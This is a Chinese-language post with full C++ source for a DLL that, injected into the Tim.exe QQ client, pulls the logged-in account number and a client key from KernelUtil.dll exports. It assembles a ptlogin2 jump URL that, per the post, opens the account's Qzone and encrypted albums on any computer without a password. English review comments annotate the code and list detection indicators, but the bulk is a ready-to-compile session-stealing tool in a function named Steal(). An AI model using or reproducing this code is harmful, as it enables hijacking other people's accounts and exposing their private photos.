DLL 编译后注入 Tim.exe,用 dbgView 等工具可以看到它输出的 url;把这个 url 复制到任何一台电脑,用浏览器打开,不需要密码就能进入该帐号的空间,查看加密相册等。也就是说,url 里的 clientkey 本身就相当于登录凭据,谁拿到它谁就等于已登录。
DLL源码:
- // dllmain.cpp : 定义 DLL 应用程序的入口点。
- #include "pch.h"
- #include <stdio.h>
- #include <WTypes.h>
- // Define CTXStringW as an alias of BSTR.
  // NOTE(review): the name matches the CTXStringW type that appears in the
  // mangled GetSignature export resolved in Steal(); presumably this alias
  // stands in for that class - confirm against the target module.
- typedef BSTR CTXStringW;
  // Builds a heap buffer made of a 16-byte header followed by a copy of
  // lpSrc, and returns a pointer to the character data just past the header.
  // Returns NULL when lpSrc is NULL. Nothing in the code visible here
  // releases the buffer.
- CTXStringW AllocTXString(const wchar_t* lpSrc)
- {
- if (lpSrc == NULL) return NULL;
  // 16 header bytes plus the string and its terminator at 2 bytes per character.
- BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
- if (bBuffer == NULL) return NULL;
- DWORD dwZero = 0;
- DWORD dwCount = 3;
- DWORD dwLenth = wcslen(lpSrc) + 1;
  // The header is four DWORDs: 0, 3, length, length (length counts the
  // terminator). NOTE(review): the meaning of each field is not shown on
  // this page; presumably it mirrors the layout the callee expects - verify.
- memmove(bBuffer + 0 * 4, &dwZero, 4);
- memmove(bBuffer + 1 * 4, &dwCount, 4);
- memmove(bBuffer + 2 * 4, &dwLenth, 4);
- memmove(bBuffer + 3 * 4, &dwLenth, 4);
  // Character data starts at byte offset 16, directly after the header.
- wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
- return CTXStringW(bBuffer + 16);
- }
- VOID Steal()
- {
  // Runs inside whatever process this DLL is loaded into. It resolves two
  // exports of the already-loaded KernelUtil.dll by their mangled names,
  // calls them to read the logged-in account number and a client key, and
  // writes a login URL containing both to the debug output channel.
  // Every failure path logs a message and leaves through the do/while(0).
  // NOTE(review): nothing here uses the account password. The key is handed
  // to code executing inside the client process, so its protection rests on
  // keeping untrusted modules out of that process and on how the service
  // binds or expires the key - neither is visible on this page.
  // NOTE(review): for detection, the fixed strings in this function (the two
  // mangled export names, the "buf32ByteValueAddedSignature" argument and
  // the ptlogin2 jump URL template) are the stable indicators of this sample.
- do {
  // Only finds the module if it is already loaded; nothing is loaded here.
- HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
- if (hKernelUtil == NULL)
- {
- OutputDebugStringA("Get KernelUtil Module failed \n");
- break;
- }
- PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
- if (PtrGetSelfUin == NULL)
- {
- OutputDebugStringA("Get GetSelfUin Function failed \n");
- break;
- }
  // The export is invoked through a function-pointer cast; a zero result is
  // treated as failure.
- DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
- if (uin == NULL)
- {
- OutputDebugStringA("Invoke GetSelfUin Function failed \n");
- break;
- }
- // Format the QQ account number as decimal text for the URL below.
- char szUin[MAX_PATH] = { 0 };
- sprintf(szUin, "%d", uin);
- PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
- if (GetSignature == NULL)
- {
- OutputDebugStringA("Get GetSignature Function failed \n");
- break;
- }
  // wsBuffer is all zeros, so ClientKey starts out as an empty string object;
  // its address is passed as the first argument of the call below.
- WCHAR wsBuffer[MAX_PATH] = { 0 };
- CTXStringW ClientKey = AllocTXString(wsBuffer);
- PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");
- if (res == NULL)
- {
- OutputDebugStringA("Invoke GetSignature Function failed \n");
- break;
- }
- // The link built below opens the account's Qzone without a password: it carries the account number and the client key as query parameters.
- char msg[MAX_PATH] = { 0 };
- sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);
  // Emitted as a debug string; the post reads it with a debug-output viewer
  // on the same machine.
- OutputDebugStringA(msg);
- } while (0);
- }
- BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
- {
  // DLL entry point. Steal() is called on DLL_PROCESS_ATTACH; the thread
  // attach/detach and process detach notifications do nothing. Always
  // returns TRUE. hModule and lpReserved are not used.
  // NOTE(review): because the work happens at process attach, the load of
  // this module into the client process is the earliest event a defender
  // can observe for this sample.
- switch (ul_reason_for_call)
- {
- case DLL_PROCESS_ATTACH:
- Steal();
- break;
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- case DLL_PROCESS_DETACH:
- break;
- }
- return TRUE;
- }